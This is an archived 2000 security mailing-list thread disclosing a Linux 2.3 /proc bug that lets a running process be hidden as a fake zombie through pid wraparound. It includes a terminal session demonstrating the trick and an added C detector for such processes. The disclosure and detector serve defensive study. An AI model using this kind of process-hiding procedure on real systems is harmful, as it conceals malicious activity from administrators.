Date: Fri, 17 Mar 2000 00:56:47 +0100 (MET)
From: Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>
To: security-audit@ferret.lmh.ox.ac.uk
Subject: Process hiding in linux (fwd)

That exec() thing reminded me of another kernel problem (limited to 2.3
...fortunately) Pavel Machek and I discovered recently.

Some background: /proc/NNN inodes in 2.3 keep a pointer to task_struct
(earlier versions used a pid computed from an inode number to look up that
pointer during every fs operation). This makes /proc in 2.3 resistant
against pid recycling attacks because old fds would always access the
original zombified task_struct (that is garbage collected when its
reference count drops to zero).

Unfortunately, it makes /proc vulnerable to these attacks put upside-down:
because the old task_struct pointer is stored in the inode, new fds access
the old process as well until the kernel gets rid of the inode, but this
will not happen until all old fds are closed.

A lesson learned: when an old trick fails, try out its exact opposite.

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

---------- Forwarded message ----------
Date: Mon, 13 Mar 2000 22:38:38 +0100
From: Pavel Machek <pavel@ucw.cz>
To: peak@kerberos.troja.mff.cuni.cz, pavel@ucw.cz, viro@math.psu.edu,
    linux-kernel@vger.rutgers.edu
Subject: Process hiding in linux

Hi!

/proc/pid allows strange tricks (2.3.49):

pavel@bug:~/misc$ while1 &
[1] 1349
pavel@bug:~/misc$ delayed_cat /proc/1349/status
[2]+  Stopped                 delayed_cat /proc/1349/status
pavel@bug:~/misc$ ./phide
[spawns 32450 processes and lets them exit]
pavel@bug:~/misc$ kill -9 1349
pavel@bug:~/misc$ ps aux | grep grep
Warning: /boot/System.map has an incorrect kernel version.
Warning: /usr/src/linux/System.map has an incorrect kernel version.
pavel     1337  0.0  0.5   844  336 tty1     S    22:29   0:00 grep grep
[1]-  Killed                  while1
[repeating so we are near wraparound]
pavel@bug:~/misc$ ps aux | grep grep
Warning: /boot/System.map has an incorrect kernel version.
Warning: /usr/src/linux/System.map has an incorrect kernel version.
pavel     1347  0.0  0.5   844  336 tty1     S    22:30   0:00 grep grep
pavel@bug:~/misc$ while1 & while1 & while1 & while1 & while1 &
[3] 1348
[4] 1349
[5] 1351
[6] 1352
[7] 1353
pavel@bug:~/misc$ kill 1348 1351 1352 1353

*Then* on the other console:

So what we have is process 1350 *hiding* process 1349. (Process appears
on listings, but it is marked as zombie, while it is running in the
background.)

pavel@bug:~$ ps aux | grep 1349
Warning: /boot/System.map has an incorrect kernel version.
Warning: /usr/src/linux/System.map has an incorrect kernel version.
pavel     1350  0.0  0.3   724  224 tty1     T    22:28   0:00 delayed_cat /proc/1349/status
pavel     1349 12.1  0.0     0    0 tty1     Z    22:28   0:34 [while1 <defunct>]
pavel     1361  0.0  0.5   844  332 tty2     S    22:33   0:00 grep 1349
pavel@bug:~$ kill -9 1350
pavel@bug:~$ ps aux | grep 1349
Warning: /boot/System.map has an incorrect kernel version.
Warning: /usr/src/linux/System.map has an incorrect kernel version.
pavel     1349 88.2  0.3   720  216 tty1     R    22:30   2:46 while1
pavel     1363  0.0  0.5   844  332 tty2     S    22:33   0:00 grep 1349
pavel@bug:~$

Pavel

PS: It was Pavel Kankovsky who told me something like this might be
possible. I believe this is a security problem.
-- 
I'm pavel@ucw.cz. "In my country we have almost anarchy and I don't care."
Panos Katsaloulis describing me w.r.t. patents at discuss@linmodems.org
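The ps listing above gives away the hidden task only indirectly: pid 1349 is shown as Z (a zombie) yet it is charged 12.1% CPU and its accumulated time keeps growing (0:34, later 2:46). A genuine zombie has released its address space and is never scheduled again, so the utime and stime counters in its /proc/PID/stat are frozen. The C program below is an added example, not one of the tools (while1, delayed_cat, phide) used in the mail and not kernel code: it parses two snapshots of /proc/PID/stat lines and flags any "zombie" whose CPU counters moved between them. The sample lines are constructed to mirror the listing above, not captured from a 2.3 kernel; the /proc/PID/stat field positions used are the documented ones (state is field 3, utime and stime are fields 14 and 15).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Subset of /proc/PID/stat that the check needs: pid, state letter, utime+stime. */
struct pstat {
    long pid;
    char state;
    unsigned long cpu_ticks;
};

/*
 * Parse one /proc/PID/stat line.  The comm field in parentheses may itself
 * contain spaces or parentheses, so scan from the last ')'.  After it the
 * fields are whitespace separated: state is the first one, utime and stime
 * are the 12th and 13th (fields 14 and 15 of the whole line).
 * Returns 0 on success, -1 if the line is not a well-formed stat line.
 */
int parse_stat(const char *line, struct pstat *out)
{
    const char *rp = strrchr(line, ')');
    unsigned long utime, stime;
    char state;

    if (rp == NULL)
        return -1;
    out->pid = strtol(line, NULL, 10);
    if (sscanf(rp + 1, " %c %*d %*d %*d %*d %*d %*u %*u %*u %*u %*u %lu %lu",
               &state, &utime, &stime) != 3)
        return -1;
    out->state = state;
    out->cpu_ticks = utime + stime;
    return 0;
}

/*
 * A real zombie cannot run, so its CPU counters cannot move.  A task that
 * reports state Z in both snapshots but whose utime+stime grew in between
 * is a live process seen through a stale /proc inode, the situation the ps
 * output in the mail shows for pid 1349.
 */
int is_fake_zombie(const struct pstat *earlier, const struct pstat *later)
{
    return earlier->pid == later->pid
        && earlier->state == 'Z' && later->state == 'Z'
        && later->cpu_ticks > earlier->cpu_ticks;
}

/*
 * Compare two snapshots line by line (same pid order assumed), store the
 * suspicious pids in `flagged` and return how many were found.
 * Lines that fail to parse are skipped rather than treated as evidence.
 */
int count_fake_zombies(const char *const *snap1, const char *const *snap2,
                       size_t n, long *flagged)
{
    int found = 0;
    for (size_t i = 0; i < n; i++) {
        struct pstat a, b;
        if (parse_stat(snap1[i], &a) != 0 || parse_stat(snap2[i], &b) != 0)
            continue;
        if (is_fake_zombie(&a, &b))
            flagged[found++] = a.pid;
    }
    return found;
}

/*
 * Constructed sample lines (not captured from a real 2.3 kernel) mirroring
 * the ps output in the mail: 1349 is reported as Z yet its CPU time keeps
 * growing, 1350 is the stopped delayed_cat, 1400 is a genuine zombie whose
 * counters stay put.
 */
static const char *const snapshot1[] = {
    "1349 (while1) Z 1025 1349 1025 1025 1349 4194304 0 0 0 0 3400 40",
    "1350 (delayed_cat) T 1025 1350 1025 1025 1349 4194304 120 0 0 0 0 0",
    "1400 (true) Z 1 1400 1 0 -1 4194304 5 0 0 0 2 1",
};
static const char *const snapshot2[] = {
    "1349 (while1) Z 1025 1349 1025 1025 1349 4194304 0 0 0 0 16600 120",
    "1350 (delayed_cat) T 1025 1350 1025 1025 1349 4194304 120 0 0 0 0 0",
    "1400 (true) Z 1 1400 1 0 -1 4194304 5 0 0 0 2 1",
};
#define NSAMPLES (sizeof snapshot1 / sizeof snapshot1[0])

int main(void)
{
    long flagged[NSAMPLES];
    int n = count_fake_zombies(snapshot1, snapshot2, NSAMPLES, flagged);
    for (int i = 0; i < n; i++)
        printf("pid %ld: reported as zombie but still consuming CPU\n", flagged[i]);
    return 0;
}
```

On a live system the two snapshots would be fresh reads of /proc/PID/stat a few seconds apart; the check is deliberately conservative and only fires on a state-Z entry whose counters increased, so real zombies and stopped processes are never reported.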